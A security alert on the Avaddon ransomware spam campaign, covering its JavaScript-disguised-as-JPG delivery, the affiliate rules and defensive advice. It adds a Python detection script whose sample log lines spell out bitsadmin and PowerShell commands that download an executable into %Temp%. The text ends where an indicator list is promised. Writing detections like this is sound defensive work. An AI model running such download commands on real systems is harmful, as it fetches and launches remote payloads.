Security Alerts

Avaddon Ransomware Launches a Massive Global Spam Campaign

On June 8, 2020, a new ransomware variant, dubbed "Avaddon," was observed being delivered by a massive spam campaign targeting users globally. The Phorpiex botnet has been identified distributing it via malicious emails carrying a JavaScript file that masquerades as a JPG image. When the recipient opens the attachment, the JavaScript runs PowerShell and BITSAdmin commands to download the Avaddon executable into the user's %Temp% folder and launch it. The ransomware then encrypts files on the victim's computer, appending the ".avdn" extension to each encrypted file. Once encryption is complete, Avaddon displays a ransom note directing the victim to a Tor payment site with instructions on how to buy a decryptor.
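The delivery chain above (script attachment posing as an image, a script host spawning PowerShell or BITSAdmin to pull a payload into %Temp%, and the ".avdn" rename after encryption) maps onto three cheap detections. The following is an added example written for this page, not code from the alert or from any vendor: the attachment-naming pattern (an image extension followed by a script extension), the pipe-separated process-creation log format, the field names and every sample value are constructed assumptions for illustration.

```python
"""Heuristics for the three stages of the Avaddon chain described above.
Added example; log format, field names and sample data are assumptions."""
import re
from dataclasses import dataclass

# Decoy extension the user is meant to see, and the script types WSH will run.
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # run the .js attachment
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}  # fetch the payload


def is_masquerading_script(filename: str) -> bool:
    """Stage 1: attachment such as 'IMG123456.jpg.js' (assumed naming).
    Windows hides the last extension by default, so the user sees a JPG
    while the real type is a script; flag image-decoy + script-real pairs."""
    parts = filename.lower().split(".")
    if len(parts) < 3:
        return False
    real_ext, decoy_ext = "." + parts[-1], "." + parts[-2]
    return real_ext in SCRIPT_EXTS and decoy_ext in IMAGE_EXTS


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def is_script_download_chain(ev: ProcEvent) -> bool:
    """Stage 2: a script host launching PowerShell/BITSAdmin with a download
    command whose destination is the user's %Temp% folder."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent not in SCRIPT_HOSTS or child not in DOWNLOADERS:
        return False
    cmd = ev.command_line.lower()
    downloads = ("/transfer" in cmd or "downloadfile" in cmd
                 or "invoke-webrequest" in cmd or "start-bitstransfer" in cmd)
    to_temp = bool(re.search(r"%temp%|\\appdata\\local\\temp\\", cmd))
    return downloads and to_temp


def count_avdn_files(paths) -> int:
    """Stage 3: files carrying the '.avdn' extension. A sudden jump in this
    count on a file share is a post-encryption indicator that can trigger
    isolation of the writing host."""
    return sum(1 for p in paths if p.lower().endswith(".avdn"))


# Constructed telemetry, not real captures. example.invalid is a reserved name.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|Image=C:\\Windows\\System32\\bitsadmin.exe"
    "|CommandLine=bitsadmin /transfer job /download /priority high "
    "http://example.invalid/p.exe %TEMP%\\p.exe",
    "ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden (New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/p.exe','%TEMP%\\p.exe')",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell Get-ChildItem C:\\Users",
]


def scan(attachments, log_lines, paths) -> dict:
    """Run all three checks and return what fired."""
    events = [parse_event(l) for l in log_lines]
    return {
        "masquerading_attachments": [a for a in attachments if is_masquerading_script(a)],
        "download_chains": [e.command_line for e in events if is_script_download_chain(e)],
        "avdn_files": count_avdn_files(paths),
    }


if __name__ == "__main__":
    result = scan(["IMG123456.jpg.js", "holiday.jpg"], SAMPLE_EVENTS,
                  ["Q3.docx.avdn", "Q3.xlsx", "notes.txt.AVDN"])
    for key, value in result.items():
        print(key, value)
```

The stage-2 rule is deliberately tied to the parent/child pair rather than to the URL or file name, which the operators can change per campaign; a mail gateway that drops script-type attachments outright (the anti-spam recommendation below) removes stage 1 before any of this runs.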

According to an advertisement observed on an undisclosed Russian-language forum, the Avaddon operators claim to be running a new Ransomware-as-a-Service (RaaS) program. Affiliates who join can distribute the ransomware through spam, compromised networks, and exploit kits, but must abide by a set of rules; for example, they may not target victims in the Commonwealth of Independent States (CIS) and neighbouring post-Soviet countries: Armenia, Azerbaijan, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan. At the time of writing, the overall impact of the Avaddon campaign is unclear.

It is recommended that users maintain reliable, tested backups that can be restored offline, implement an anti-spam solution that blocks script attachments and phishing emails before they reach the network, and keep operating systems up to date. The following indicators of compromise have been identified with Avaddon ransomware:
